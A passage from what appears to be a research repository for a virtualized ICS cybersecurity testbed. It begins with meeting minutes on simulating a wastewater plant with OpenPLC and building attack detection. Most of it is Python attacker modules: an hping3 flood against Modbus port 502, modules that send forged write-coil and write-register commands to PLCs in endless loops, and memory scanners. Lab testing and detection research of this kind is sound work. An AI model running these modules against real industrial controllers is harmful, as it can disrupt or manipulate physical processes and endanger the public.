[ ] Deploy whole project on GNS3 38 | - [ ] Test if VM supports attacker 39 | - [ ] Implement ModTester automatization 40 | - [ ] Research for attack behaviour measurements and measurement methods 41 | - [ ] Network based methods: pfsense, firewall, etc. 42 | - [ ] Repo documentaiton 43 | -------------------------------------------------------------------------------- /Minutes/2023-06-08.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 08/06/2023 2 | 3 | ## Minutes 4 | 5 | - Minute created by [Ander Gómez](https://github.com/gomezander). 6 | 7 | ## Closed issues and decisions 8 | 9 | - [Ander Gómez](https://github.com/gomezander) deployed simplified version of the project on GNS3 and performed some attacks successfully. [Video Demonstration](https://www.youtube.com/watch?v=W10l6Pk4seo) 10 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) gave [Ander Gómez](https://github.com/gomezander) feedback about the automation.py diagram- 11 | 12 | ## Open issues and questions 13 | 14 | - Proposals of possible solutions and workarounds to the [OpenPLC-WWTP interface problem](https://github.com/sfl0r3nz05/ICSsVirtualForCiberSec/issues/29) 15 | - OpenPLC Forum 16 | - GNS3 deployment of the whole project 17 | - Communication errors on the WWTP-OpenPLC interface appear sometimes, triggering socket binding errors. Might have to do witch packet loss between interface and OpenPLC. 18 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) will test the project deployment and perform troubleshooting 19 | - Measures and attack detection methods 20 | - [Ander Gómez](https://github.com/gomezander) will develop attack-detection table 21 | - [Ander Gómez](https://github.com/gomezander) wil implement attack detection algorithm described in [This Paper](https://www.sciencedirect.com/science/article/abs/pii/S1874548218301641) for each of the signals measured in the WWTP. 22 | - [Ander Gómez](https://github.com/gomezander) will implement pfsense firewall on server host machine to monitorize network interfaces 23 | - [Ander Gómez](https://github.com/gomezander) will implment wazhu on GNS3 to monitorize network metrics and detect possible attacks 24 | - [Ander Gómez](https://github.com/gomezander) will complete ModTester automatization feature 25 | - [Ander Gómez](https://github.com/gomezander) will fix modTester.py diagram based on received feedback 26 | - [Ander Gómez](https://github.com/gomezander) continued research about attack behaviour methods and measurements 27 | 28 | ## Discussion and proposals 29 | 30 | - GNS3 deployment of whole project 31 | - Possible GNS3 network mapping errors 32 | - Attack behaviour measurement and methods 33 | - Network-based methods: pfsense, wazhu, paper algorithm 34 | 35 | ## Special notes 36 | 37 | ### ToDo List 38 | 39 | - [ ] Fix WWTP-OpenPLC interface deployment problem 40 | - [ ] OpenPLC Forum feedback 41 | - [ ] Write attack-detection table for each case 42 | - [ ] Deploy whole project on GNS3 43 | - [ ] Try to fix sporadic errors 44 | - [ ] Implement pfsense on host 45 | - [ ] Implement wazhu as GNS3 container 46 | - [ ] Deveop paper algorithm 47 | - [ ] implement algorithm on GNS3 48 | - [ ] Implement ModTester automatization 49 | - [ ] Research for attack behaviour measurements and measurement methods 50 | - [ ] Network based methods: pfsense, firewall, etc. 51 | - [ ] Repo documentaiton 52 | -------------------------------------------------------------------------------- /Minutes/2023-06-14.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 14/06/2023 2 | 3 | ## Minutes 4 | 5 | - Minute created by [Ander Gómez](https://github.com/gomezander). 6 | 7 | ## Closed issues and decisions 8 | 9 | - Measures and attack detection methods 10 | - [Ander Gómez](https://github.com/gomezander) developed attack-detection table 11 | - [Ander Gómez](https://github.com/gomezander) started to implement attack detection algorithm described in [This Paper](https://www.sciencedirect.com/science/article/abs/pii/S1874548218301641) for each of the signals measured in the WWTP. 12 | - [Ander Gómez](https://github.com/gomezander) tried to implment wazhu on GNS3 to monitorize network metrics and detect possible attacks 13 | 14 | ## Open issues and questions 15 | 16 | - GNS3 deployment of the whole project 17 | - Communication errors on the WWTP-OpenPLC interface appear sometimes, triggering socket binding errors. Might have to do witch packet loss between interface and OpenPLC. 18 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) will test the project deployment and perform troubleshooting 19 | - Measures and attack detection methods 20 | - [Ander Gómez](https://github.com/gomezander) will finish implementing attack detection algorithm described in [This Paper](https://www.sciencedirect.com/science/article/abs/pii/S1874548218301641) for each of the signals measured in the WWTP. 21 | - [Ander Gómez](https://github.com/gomezander) will finish deploying wazuh on GNS3 to monitorize network metrics and detect possible attacks 22 | - Proposals of possible solutions and workarounds to the [OpenPLC-WWTP interface problem](https://github.com/sfl0r3nz05/ICSsVirtualForCiberSec/issues/29) 23 | - OpenPLC Forum 24 | - [Ander Gómez](https://github.com/gomezander) will complete ModTester automatization feature 25 | - [Ander Gómez](https://github.com/gomezander) will fix modTester.py diagram based on received feedback 26 | - [Ander Gómez](https://github.com/gomezander) continued research about attack behaviour methods and measurements 27 | 28 | ## Discussion and proposals 29 | 30 | - Problem installing pfsense on GNS3 server machine 31 | - AWS VM does not support virtualization 32 | - Possible workaround: deploy project on local [VM](https://documentation.wazuh.com/current/deployment-options/virtual-machine/virtual-machine.html) 33 | - Problem installing wazhu on GNS3 project 34 | - Algorithm implementation 35 | - Top priority at the moment 36 | - Python container running script for each of the WWTP variables 37 | 38 | ## Special notes 39 | 40 | ### ToDo List 41 | 42 | - [x] Write attack-detection table for each case 43 | - [ ] Deploy whole project on GNS3 44 | - [ ] Try to fix sporadic errors 45 | - [ ] Implement pfsense on host 46 | - [ ] Implement wazhu as GNS3 container 47 | - [x] Develop paper algorithm 48 | - [ ] implement algorithm on GNS3 49 | - [ ] Fix WWTP-OpenPLC interface deployment problem 50 | - [ ] OpenPLC Forum feedback 51 | - [ ] Implement ModTester automatization 52 | - [x] Research for attack behaviour measurements and measurement methods 53 | - [x] Network based methods: pfsense, firewall, etc. 54 | - [ ] Repo documentaiton 55 | -------------------------------------------------------------------------------- /Minutes/2023-06-21.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 21/06/2023 2 | 3 | ## Minutes 4 | 5 | - Minute created by [Ander Gómez](https://github.com/gomezander). 6 | 7 | ## Closed issues and decisions 8 | 9 | - Measures and attack detection methods 10 | - [Ander Gómez](https://github.com/gomezander) mplemented attack detection algorithm described in [This Paper](https://www.sciencedirect.com/science/article/abs/pii/S1874548218301641) for each of the signals measured in the WWTP. 11 | - [Ander Gómez](https://github.com/gomezander) tried to implment wazhu on GNS3 to monitorize network metrics and detect possible attacks 12 | 13 | ## Open issues and questions 14 | 15 | - GNS3 deployment of the whole project 16 | - Communication errors on the WWTP-OpenPLC interface appear sometimes, triggering socket binding errors. Might have to do witch packet loss between interface and OpenPLC. 17 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) will test the project deployment and perform troubleshooting 18 | - Measures and attack detection methods 19 | - [Ander Gómez](https://github.com/gomezander) will finish implementing attack detection algorithm described in [This Paper](https://www.sciencedirect.com/science/article/abs/pii/S1874548218301641) for each of the signals measured in the WWTP. 20 | - [Ander Gómez](https://github.com/gomezander) will finish deploying wazuh on GNS3 to monitorize network metrics and detect possible attacks 21 | - Proposals of possible solutions and workarounds to the [OpenPLC-WWTP interface problem](https://github.com/sfl0r3nz05/ICSsVirtualForCiberSec/issues/29) 22 | - OpenPLC Forum 23 | - [Ander Gómez](https://github.com/gomezander) will complete ModTester automatization feature 24 | - [Ander Gómez](https://github.com/gomezander) will fix modTester.py diagram based on received feedback 25 | - [Ander Gómez](https://github.com/gomezander) continued research about attack behaviour methods and measurements 26 | 27 | ## Discussion and proposals 28 | - Main priority: document the project properly 29 | - Problem installing pfsense on GNS3 server machine 30 | - AWS VM does not support virtualization 31 | - Possible workaround: deploy project on local [VM](https://documentation.wazuh.com/current/deployment-options/virtual-machine/virtual-machine.html) 32 | - Problem installing wazhu on GNS3 project 33 | - Algorithm implementation 34 | - Top priority at the moment 35 | - Python container running script for each of the WWTP variables 36 | 37 | ## Special notes 38 | 39 | ### ToDo List 40 | 41 | - [ ] Document Project 42 | - [x] Write attack-detection table for each case 43 | - [ ] Deploy whole project on GNS3 44 | - [ ] Try to fix sporadic errors 45 | - [ ] Implement pfsense on host 46 | - [ ] Implement wazhu as GNS3 container 47 | - [x] Develop paper algorithm 48 | - [ ] implement algorithm on GNS3 49 | - [ ] Fix WWTP-OpenPLC interface deployment problem 50 | - [ ] OpenPLC Forum feedback 51 | - [ ] Implement ModTester automatization 52 | - [x] Research for attack behaviour measurements and measurement methods 53 | - [x] Network based methods: pfsense, firewall, etc. 54 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/dos/floodingAttack.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | import subprocess 4 | 5 | from System.Core.Global import * 6 | from System.Core.Colors import * 7 | from System.Core.Modbus import * 8 | from System.Lib import ipcalc 9 | 10 | class Module: 11 | 12 | 13 | info = { 14 | 'Name': 'Flooding Attack', 15 | 'Author': ['@Danel'], 16 | 'Description': ("Flooding Attack with Hping script"), 17 | 18 | } 19 | options = { 20 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 21 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 22 | 'FLAG' :['-S' ,True ,'Set the FLAG [-S,-F,-R,-P,-A,-U]'], 23 | 'sIP' :['' ,True ,'Source IP (--rand-source)'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | self.printLine('[+] Flooding Attack started:',bcolors.OKGREEN) 31 | print "hping3 %s -p %s %s --flood %s" %(self.options['FLAG'][0],self.options['RPORT'][0],self.options['sIP'][0],self.options['RHOSTS'][0]) 32 | self.printLine('[-] Control + c to STOP',bcolors.WARNING) 33 | flood = os.system("/usr/sbin/hping3 %s -p %s --flood %s" %(self.options['FLAG'][0],self.options['RPORT'][0],self.options['RHOSTS'][0])) 34 | #subprocess.Popen(["./hping.sh"],stdin=subprocess.None) 35 | 36 | 37 | 38 | 39 | 40 | def printLine(self,str,color): 41 | self.output += str + '\n' 42 | if(str.find('[+]') != -1): 43 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 44 | elif(str.find('[-]') != -1): 45 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 46 | else: 47 | print str 48 | 49 | 50 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/dos/writeSingleCoils.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Write Single Coil', 14 | 'Author': ['@Danel'], 15 | 'Description': ("DOS Write Single Coil Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'OutputAddr' :['0x0000' ,True ,'Output Address from 0x0000 to 0xffff.'], 23 | 'OutputValue' :['0x0000' ,True ,'Value to write, 0x0000 == Off, 0xFF00 == On.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c1 = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c1 == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | #closeConnectionToTarget(c) 66 | 67 | while True: 68 | #c1 = connectToTarget(ip,self.options['RPORT'][0]) 69 | ans = c1.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU05_Write_Single_Coil(outputAddr=int(self.options['OutputAddr'][0],16),outputValue=int(self.options['OutputValue'][0],16)),timeout=timeout, verbose=0) 70 | ans = ModbusADU_Answer(str(ans)) 71 | self.printLine('[+] Response is :',bcolors.OKGREEN) 72 | ans.show() 73 | 74 | #Cerramos conexion 75 | #closeConnectionToTarget(c1) 76 | 77 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/dos/writeSingleCoilsID.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Write Single Coil', 14 | 'Author': ['@Danel'], 15 | 'Description': ("DOS Write Single Coil Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'OutputAddr' :['0x0000' ,True ,'Output Address from 0x0000 to 0xffff.'], 23 | 'OutputValue' :['0x0000' ,True ,'Value to write, 0x0000 == Off, 0xFF00 == On.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c1 = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c1 == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | closeConnectionToTarget(c) 66 | 67 | while True: 68 | #Abrir conexion 69 | c1 = connectToTarget(ip,self.options['RPORT'][0]) 70 | ans = c1.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU05_Write_Single_Coil(outputAddr=int(self.options['OutputAddr'][0],16),outputValue=int(self.options['OutputValue'][0],16)),timeout=timeout, verbose=0) 71 | ans = ModbusADU_Answer(str(ans)) 72 | self.printLine('[+] Response is :',bcolors.OKGREEN) 73 | ans.show() 74 | 75 | #Cerramos conexion 76 | closeConnectionToTarget(c1) 77 | 78 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/dos/writeSingleRegister.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Write Single Register', 14 | 'Author': ['@Danel'], 15 | 'Description': ("DOS Write Single Register "), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'RegisterAddr' :['0x0000' ,True ,'Register Address.'], 23 | 'RegisterValue' :['0x0000' ,True ,'Register Value.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | while True: 66 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU06_Write_Single_Register(registerAddr=int(self.options['RegisterAddr'][0],16),registerValue=int(self.options['RegisterValue'][0],16)),timeout=timeout, verbose=0) 67 | ans = ModbusADU_Answer(str(ans)) 68 | self.printLine('[+] Response is :',bcolors.OKGREEN) 69 | ans.show() -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/dos/writeSingleRegisterID.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Write Single Register', 14 | 'Author': ['@Danel'], 15 | 'Description': ("DOS Write Single Register "), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'RegisterAddr' :['0x0000' ,True ,'Register Address.'], 23 | 'RegisterValue' :['0x0000' ,True ,'Register Value.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | closeConnectionToTarget(c) 66 | 67 | while True: 68 | c1 = connectToTarget(ip,self.options['RPORT'][0]) 69 | ans = c1.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU06_Write_Single_Register(registerAddr=int(self.options['RegisterAddr'][0],16),registerValue=int(self.options['RegisterValue'][0],16)),timeout=timeout, verbose=0) 70 | ans = ModbusADU_Answer(str(ans)) 71 | self.printLine('[+] Response is :',bcolors.OKGREEN) 72 | ans.show() 73 | 74 | closeConnectionToTarget(c1) -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/scanner/coilDiscover.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | 10 | 11 | 12 | class Module: 13 | 14 | 15 | info = { 16 | 'Name': 'Modbus Coil Discover', 17 | 'Author': ['@Danel'], 18 | 'Description': (" Modbus Coilstatus discover"), 19 | 20 | } 21 | options = { 22 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 23 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'UID' :[None ,True ,'Modbus Slave UID.'], 26 | 'Output' :[True ,False ,'The stdout save in output directory'] 27 | } 28 | 29 | output = '' 30 | 31 | def exploit(self): 32 | 33 | moduleName = self.info['Name'] 34 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 35 | ips = list() 36 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 37 | ips.append(str(ip)) 38 | while ips: 39 | for i in range(int(self.options['Threads'][0])): 40 | if(len(ips) > 0): 41 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 42 | thread.start() 43 | THREADS.append(thread) 44 | else: 45 | break 46 | for thread in THREADS: 47 | thread.join() 48 | if(self.options['Output'][0]): 49 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 50 | self.output = '' 51 | 52 | def printLine(self,str,color): 53 | self.output += str + '\n' 54 | if(str.find('[+]') != -1): 55 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 56 | elif(str.find('[-]') != -1): 57 | print str.replace('[-]',color + '[-]' + bcolors.ENDC) 58 | else: 59 | print str 60 | 61 | def do(self,ip): 62 | c = connectToTarget(ip,self.options['RPORT'][0]) 63 | 64 | #Variables para recorre memoria y bloque de memoria a descubrir 65 | addressInt = 0 66 | MEM =[ [],[] ] 67 | top = addressInt + 10000 68 | 69 | 70 | if (c != None): 71 | 72 | 73 | while(addressInt <= top): 74 | 75 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU01_Read_Coils(startAddr=addressInt,quantity=1),timeout=timeout, verbose=0) 76 | ans = ModbusADU_Answer(str(ans)) 77 | #self.printLine('[+] Response is :',bcolors.OKGREEN) 78 | #ans.show() 79 | 80 | #La respuesta es correcta 81 | if(ans.funcCode != 0x81): 82 | MEM[0].append(addressInt) 83 | MEM[1].append(ans.coilStatus) 84 | 85 | 86 | 87 | addressInt += 1 88 | 89 | sys.stdout.write("\rCorriendo : {} % ".format(addressInt/100)) 90 | sys.stdout.flush() 91 | print '\n' 92 | 93 | 94 | print '-------------------------------------------' 95 | print 'Coils en memoria: {}'.format(len(MEM[0])) 96 | 97 | for x in range(len(MEM[0])): 98 | print MEM[0][x]," ==>" ,MEM[1][x] 99 | 100 | 101 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/scanner/discover.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core import Modbus 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Modbus Discover', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Check Modbus Protocols"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 22 | 'Output' :[True ,False ,'The stdout save in output directory'] 23 | } 24 | output = '' 25 | 26 | def exploit(self): 27 | 28 | moduleName = self.info['Name'] 29 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 30 | ips = list() 31 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 32 | ips.append(str(ip)) 33 | while ips: 34 | for i in range(int(self.options['Threads'][0])): 35 | if(len(ips) > 0): 36 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 37 | thread.start() 38 | THREADS.append(thread) 39 | else: 40 | break 41 | for thread in THREADS: 42 | thread.join() 43 | if(self.options['Output'][0]): 44 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 45 | self.output = '' 46 | 47 | def printLine(self,str,color): 48 | self.output += str + '\n' 49 | if(str.find('[+]') != -1): 50 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 51 | elif(str.find('[-]') != -1): 52 | print str.replace('[-]',color + '[-]' + bcolors.ENDC) 53 | else: 54 | print str 55 | 56 | def do(self,ip): 57 | result = Modbus.connectToTarget(ip,self.options['RPORT'][0]) 58 | if (result != None): 59 | self.printLine('[+] Modbus is running on : ' + ip,bcolors.OKGREEN) 60 | 61 | else: 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | 64 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/scanner/discreteInputDiscover.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | 10 | 11 | 12 | class Module: 13 | 14 | 15 | info = { 16 | 'Name': 'Modbus Discrete Input Discover', 17 | 'Author': ['@Danel'], 18 | 'Description': (" Modbus Discrete Input Scanner"), 19 | 20 | } 21 | options = { 22 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 23 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'UID' :[None ,True ,'Modbus Slave UID.'], 26 | 'Output' :[True ,False ,'The stdout save in output directory'] 27 | } 28 | 29 | output = '' 30 | 31 | def exploit(self): 32 | 33 | moduleName = self.info['Name'] 34 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 35 | ips = list() 36 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 37 | ips.append(str(ip)) 38 | while ips: 39 | for i in range(int(self.options['Threads'][0])): 40 | if(len(ips) > 0): 41 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 42 | thread.start() 43 | THREADS.append(thread) 44 | else: 45 | break 46 | for thread in THREADS: 47 | thread.join() 48 | if(self.options['Output'][0]): 49 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 50 | self.output = '' 51 | 52 | def printLine(self,str,color): 53 | self.output += str + '\n' 54 | if(str.find('[+]') != -1): 55 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 56 | elif(str.find('[-]') != -1): 57 | print str.replace('[-]',color + '[-]' + bcolors.ENDC) 58 | else: 59 | print str 60 | 61 | def do(self,ip): 62 | c = connectToTarget(ip,self.options['RPORT'][0]) 63 | 64 | #Variables para recorre memoria y bloque de memoria a descubrir 65 | addressInt = 0 66 | MEM =[ [],[] ] 67 | top = addressInt + 10000 68 | 69 | if (c != None): 70 | 71 | 72 | while(addressInt <= top ): 73 | 74 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU02_Read_Discrete_Inputs(startAddr=addressInt,quantity=1),timeout=timeout, verbose=0) 75 | ans = ModbusADU_Answer(str(ans)) 76 | #self.printLine('[+] Response is :',bcolors.OKGREEN) 77 | #ans.show() 78 | 79 | 80 | #La respuesta es correcta 81 | if(ans.funcCode != 0x82): 82 | MEM[0].append(addressInt) 83 | MEM[1].append(ans.inputStatus) 84 | 85 | 86 | addressInt += 1 87 | 88 | sys.stdout.write("\rCorriendo : {} % ".format(addressInt/100)) 89 | sys.stdout.flush() 90 | print '\n' 91 | 92 | 93 | 94 | print '-------------------------------------------' 95 | print 'Discrete Inputs en memoria: 